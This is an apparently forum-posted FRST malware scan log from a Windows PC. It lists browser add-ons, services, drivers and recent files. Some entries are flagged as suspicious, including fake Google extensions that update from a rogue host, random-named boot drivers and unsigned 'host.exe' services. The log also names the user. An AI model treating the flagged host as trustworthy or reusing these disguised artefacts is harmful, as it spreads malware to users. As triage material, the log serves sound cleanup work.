BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2014-11-12] (Microsoft Corporation)
BHO-x32: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll [2015-03-30] (Oracle Corporation)
BHO-x32: ArcPluginIEBHO Class -> {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} -> C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\ArcPluginIE.dll [2017-04-28] (Perfect World Entertainment Inc)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO-x32: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files (x86)\Common Files\Webroot\WebFiltering\wrflt.dll [2017-12-07] (Webroot)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2014-11-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll [2015-03-30] (Oracle Corporation)
Toolbar: HKLM - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Toolbar: HKLM-x32 - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - No File

FireFox:
========
FF ProfilePath: C:\Users\Betts\AppData\Roaming\Netscape\Navigator\Profiles\wb66fkfq.default [2016-11-27]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com [not found]
FF ProfilePath: C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default [2018-11-01]
FF NewTab: Mozilla\Firefox\Profiles\7o4jccun.default -> hxxp://ph.search.yahoo.com/?fr=hp-ddc-bd-tab&type=608_pr__alt__ddc_dsssyctab_bd_com
FF NetworkProxy: Mozilla\Firefox\Profiles\7o4jccun.default -> type", 0
FF Extension: (Do Not Survey) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\do-not-survey@erikvold.com.xpi [2016-05-01] [Legacy]
FF Extension: (Groove Shredder) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\grooveshredder@code.argee.org.xpi [2016-05-01] [Legacy]
FF Extension: (leethax.net extension) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\leethax@leethax.net.xpi [2014-01-04] [Legacy] [not signed]
FF Extension: (Stylish - Custom themes for any website) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{46551EC9-40F0-4e47-8E18-8E5CF550CFB8}.xpi [2018-08-17]
FF Extension: (Adblock Plus) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2018-10-31]
FF Extension: (Screenshoter Fixed) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{d9babd10-47de-11df-9879-0800200c9a67}.xpi [2017-06-12] [Legacy]
FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06] [Legacy]
FF HKLM\...\Firefox\Extensions: [webrootsecure@webroot.com] - C:\ProgramData\WRData\PKG\FF_WEBEX => not found
FF HKLM-x32\...\Firefox\Extensions: [webrootsecurewebextensions@webroot.com] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_187.dll [2017-11-14] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-09-20] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll [2011-11-03] (ESN Social Software AB)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-07] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.40.2 -> C:\Windows\SysWOW64\npDeployJava1.dll [2015-03-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll [2015-03-30] (Oracle Corporation)
FF Plugin-x32: @kuaiyong.yrtd.com,version=1.0.1.1 -> C:\Program Files (x86)\kuaiyong\np_kyplugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-05] (Microsoft Corporation)
FF Plugin-x32: @perfectworld.com/npArcPlayNowPlugin -> C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll [2017-04-28] (Perfect World Entertainment Inc)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-09-20] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1722513563-2756437970-1780137624-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Betts\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-01-23] (Unity Technologies ApS)
StartMenuInternet: Firefox- - kernel32::GetLongPathNameW(w R8, w .R7, I 1024)I .R6
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-08-22] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR RestoreOnStartup: Default -> "hxxp://ph.search.yahoo.com/?fr=hp-ddc-bd&type=608_pr__alt__ddc_dsssyc_bd_com"
CHR Profile: C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default [2018-11-01]
CHR Extension: (Google Docs) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Google Drive) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-27] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (YouTube Downloader Video) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apkpjaoijbnjlgcmjmjjmkcmojcopdip [2017-07-04]
CHR Extension: (MEGA) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2018-10-28]
CHR Extension: (YouTube) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-27]
CHR Extension: (Adblock Plus) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2018-11-01]
CHR Extension: (Google Search) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-02]
CHR Extension: (Realm of the Mad God) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhjfmaldpppkmjjgkmadddbanpabfflp [2016-07-31]
CHR Extension: (Free Chrome VPN proxy) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\domgapgimficjfpblhbihklajoofkijh [2018-03-02]
CHR Extension: (Adobe Acrobat) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-12-12]
CHR Extension: (Google Docs Offline) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-18]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2018-10-19]
CHR Extension: (Video Adblocker for Youtube™ Extension) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\hflefjhkfeiaignkclmphmokmmbhbhik [2018-08-28]
CHR Extension: (AllCast Receiver) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjbljnpdahefgnopeohlaeohgkiidnoe [2016-09-16]
CHR Extension: (Mauf - Custom Messenger Colors) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfjnmganegfpajpgchndgfjbljnehink [2018-05-09]
CHR Extension: (Material Deep Black Theme) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\kicomekdnoaegbahblnaiccfbcnhbfhb [2018-09-30]
CHR Extension: (Skype Click to Call) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-08-02] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Hotspot Shield VPN Free Proxy – Unblock Sites) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2018-11-01]
CHR Extension: (Google Wallet) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-03-21] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Simple EPUB Reader) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojhbgcchcbdjdenibfmjofobklkkhofc [2017-07-09]
CHR Extension: (Grooveshark Downloader) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp [2015-04-23] [UpdateUrl: hxxp://groovesharkdownload.net/Download/updates.xml] <==== ATTENTION
CHR Extension: (Gmail) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR Extension: (Chrome Media Router) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kjeghcllfecehndceplomkocgfbklffd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [ngkhgikojglcgnckopipfdajaifmmnnc] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1364904 2017-12-19] (Autodesk Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems, Incorporated)
R2 AIPS; C:\Program Files (x86)\arcai.com\aips.exe [2677760 2018-05-11] (Arcai.com) [File not signed]
S4 AirPrint; C:\Program Files (x86)\AirPrint\airprint.exe [234784 2016-10-18] (Apple Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-04-27] (Apple Inc.)
S4 ArcService; C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe [87064 2017-04-28] (Perfect World Entertainment Inc)
S4 Droid4XService; C:\Program Files (x86)\Droid4X\Droid4XService.exe [279552 2016-06-13] () [File not signed]
R2 GarenaPlatform; C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe [315712 2018-08-07] (Garena Online )
S4 Hadouken; C:\Program Files (x86)\Hadouken\hadouken.exe [4484096 2015-08-11] () [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 KMS-R@1n; C:\Windows\KMS-R@1n.exe [26112 2018-08-23] () [File not signed]
S4 KvAppService; C:\Program Files (x86)\Keepvid\KAF\2.4.2.222\KvAppService.exe [474824 2017-03-10] (Keepvid)
R2 LDrvSvc; c:\program files (x86)\ostotosoft\drivertalent\LDrvSvc.dll [189280 2018-01-29] (OSToto Co., Ltd.)
R2 MppSvc; C:\ProgramData\{A7FB8CB9-0BE2-4c79-BB9C-01F657A649CA}\mppsvc.dll [88576 2017-12-01] () [File not signed]
S2 NFramework; C:\Users\Betts\AppData\Roaming\Microsoft\NFramework\Recovery\host.exe [8192 2018-01-14] () [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [255008 2009-01-06] (NVIDIA)
S4 NVU; C:\Windows\nvidia\wintask.exe [329728 2014-08-31] () [File not signed]
S4 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2013-05-12] ()
S4 Realtek11nSU; C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe [36864 2010-04-16] (Realtek) [File not signed]
S4 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S4 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UpdateCenterService; C:\Program Files (x86)\NVIDIA Corporation\System Update\UpdateCenterService.exe [169504 2009-01-07] (NVIDIA)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
S4 WMS; C:\Windows\wmi\netmon.exe [329728 2014-08-31] () [File not signed]
S2 workframe; C:\Users\Betts\AppData\Roaming\InternetExplorer\System32\Recovery\host.exe [8192 2018-01-14] () [File not signed]
S4 WsDrvInst; C:\Program Files (x86)\Keepvid\KeepVid Music (Desktop)\DriverInstall.exe [122488 2017-07-20] ()
S4 NvContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -s NvContainerLocalSystem -a -f "C:\ProgramData\NVIDIA\NvContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem" -r -p 30000
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
 

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus64.sys [30208 2016-08-31] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag64.sys [30720 2016-08-24] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem64.sys [37376 2016-08-24] (LG Electronics Inc.)
S3 BthAvrcp; C:\Windows\System32\DRIVERS\BthAvrcp.sys [29184 2009-08-13] (CSR, plc)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 HtcUsbMdmV64; C:\Windows\System32\DRIVERS\HtcUsbMdmV64.sys [121800 2010-03-08] (QUALCOMM Incorporated)
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 NVR0Dev; C:\Windows\nvoclk64.sys [40480 2009-01-06] (NVIDIA Corp.)
R2 NVR0FLASHDev; C:\Windows\nvflsh64.sys [40992 2009-01-07] (NVIDIA Corp.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-03-14] (NVIDIA Corporation)
S3 PAC7302; C:\Windows\System32\DRIVERS\PAC7302.SYS [532480 2009-04-28] (PixArt Imaging Inc.)
S3 qcusbser; C:\Windows\System32\DRIVERS\qcusbser.sys [254520 2017-03-15] (QUALCOMM Incorporated)
S3 SaiK0836; C:\Windows\System32\DRIVERS\SaiK0836.sys [172040 2010-06-17] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [22792 2010-07-08] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [50056 2010-07-08] (Saitek)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2013-09-18] (Anchorfree Inc.)
R3 USBPcap; C:\Windows\System32\DRIVERS\USBPcap.sys [38456 2017-08-21] (USBPcap)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
R2 WinisoCDBus; C:\Windows\System32\drivers\WinisoCDBus.sys [204032 2013-12-10] (WinISO.com)
R2 WinRing0_1_2_0; D:\steam\steamapps\common\EVGA PrecisionX\WinRing0\WinRing0x64.sys [14536 2018-09-28] (OpenLibSys.org)
S3 wrUrlFlt; C:\Windows\system32\DRIVERS\wrUrlFlt.sys [67024 2017-12-07] (Webroot)
R3 WsAudioDevice_383S(1); C:\Windows\System32\drivers\WsAudioDevice_383S(1).sys [39016 2017-06-14] (Wondershare)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 GGSAFERDriver; \??\C:\Program Files (x86)\Garena Plus\Room\safedrv.sys [X]
S3 gkernel; \??\C:\Users\Betts\AppData\Local\Temp\gkernel.sys [X] <==== ATTENTION
S0 hQjWNzqD; System32\drivers\hQjWNzqD.sys [X]
S0 kzeXHiXd; System32\drivers\kzeXHiXd.sys [X]
S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
S0 pzLPPFej; System32\drivers\pzLPPFej.sys [X]
U0 SR; no ImagePath
U2 srservice; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-01 13:17 - 2018-11-01 13:18 - 000040714 _____ C:\Users\Betts\Desktop\FRST.txt
2018-11-01 12:02 - 2018-11-01 12:02 - 000555283 _____ C:\Users\Betts\Downloads\PEDIA2-GI-Part-II-Cases-Bei.pdf
2018-11-01 11:45 - 2018-11-01 11:45 - 000000000 ____D C:\Users\Betts\Desktop\FRST-OlderVersion
2018-11-01 11:44 - 2018-11-01 13:17 - 000000000 ____D C:\FRST
2018-11-01 11:42 - 2018-11-01 11:45 - 002414592 _____ (Farbar) C:\Users\Betts\Desktop\FRST64.exe
2018-11-01 11:41 - 2018-11-01 11:41 - 015065792 _____ (Microsoft Corporation) C:\Users\Betts\Downloads\mseinstall64.exe
2018-11-01 11:11 - 2018-11-01 11:11 - 005581928 _____ (COMODO) C:\Users\Betts\Downloads\cispremium_installer.exe
2018-10-31 18:45 - 2018-10-31 18:54 - 123222368 _____ C:\Users\Betts\Desktop\open_gapps-arm-8.1-pico-20181031.zip
2018-10-30 20:08 - 2018-10-30 20:08 - 000000199 _____ C:\Users\Betts\Desktop\Counter-Strike Global Offensive.url
2018-10-30 18:24 - 2018-10-30 18:24 - 000000000 ____D C:\Users\Betts\Desktop\Big K.R.I.T. - 4eva Is A Mighty Long Time
2018-10-30 16:41 - 2018-10-30 17:58 - 560416716 _____ C:\Users\Betts\Downloads\Big K.R.I.T. - 4eva Is A Mighty Long Time.zip
2018-10-30 16:38 - 2018-10-30 16:38 - 000000000 ____D C:\ProgramData\NovaRad
2018-10-30 16:37 - 2018-10-30 16:37 - 000000000 ____D C:\Users\Betts\AppData\Local\Novarad
2018-10-30 15:18 - 2018-02-21 00:38 - 000000000 ____D C:\Users\Betts\Desktop\4-44
2018-10-30 14:36 - 2018-10-30 14:53 - 479600294 _____ C:\Users\Betts\Downloads\4-44 MASTER.zip
2018-10-28 17:51 - 2018-10-28 18:14 - 087644611 _____ C:\Users\Betts\Desktop\open_gapps-arm64-8.1-pico-20181028.zip
2018-10-28 15:59 - 2018-10-28 17:51 - 351711284 _____ C:\Users\Betts\Desktop\AospExtended-v5.6-fortunave3g-20180612-1437-UNOFFICIAL.zip
2018-10-28 11:50 - 2018-10-28 11:50 - 000000000 ____D C:\Users\Betts\Desktop\Wet Bandits
2018-10-28 10:11 - 2018-10-28 10:11 - 000000000 ____D C:\Program Files\mmpicker
2018-10-28 10:10 - 2018-10-28 10:10 - 001074790 _____ C:\Users\Betts\Downloads\matchmaking_server_picker_473.zip
2018-10-28 08:15 - 2018-10-28 08:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CSGO WaRzOnE
2018-10-28 08:15 - 2018-10-28 08:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Counter Strike Global Offensive Warzone
2018-10-28 01:17 - 2018-10-28 08:27 - 000001529 _____ C:\Users\Public\Desktop\Counter Strike Global Offensive Warzone.lnk
2018-10-28 01:06 - 2018-10-28 01:06 - 000000000 ____D C:\Program Files (x86)\Warzone
2018-10-27 22:01 - 2018-10-27 22:10 - 069490870 _____ C:\Users\Betts\Downloads\BALLADS 1.zip
2018-10-27 08:21 - 2018-10-27 08:21 - 000000000 ____D C:\ProgramData\Caphyon
2018-10-27 08:07 - 2015-03-16 13:58 - 000444840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshflxgd.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000660120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomct2.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000416408 _____ (Microsoft Corporation ) C:\Windows\SysWOW64\comct332.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000279192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdatgrd.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000253080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdatlst.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000222360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tabctl32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000219288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\richtx32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000218776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dblist32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000212112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mci32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000179352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmask32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000170920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comct232.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000127640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswinsck.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000119960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomm32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000104088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\picclp32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000084624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sysinfo.ocx
2018-10-27 08:07 - 2011-01-12 13:36 - 001054208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71u.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71deu.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71ita.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71fra.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71esp.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71enu.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71kor.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71jpn.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71cht.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000040960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71chs.dll
2018-10-27 08:07 - 2011-01-12 12:53 - 000090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atl71.dll
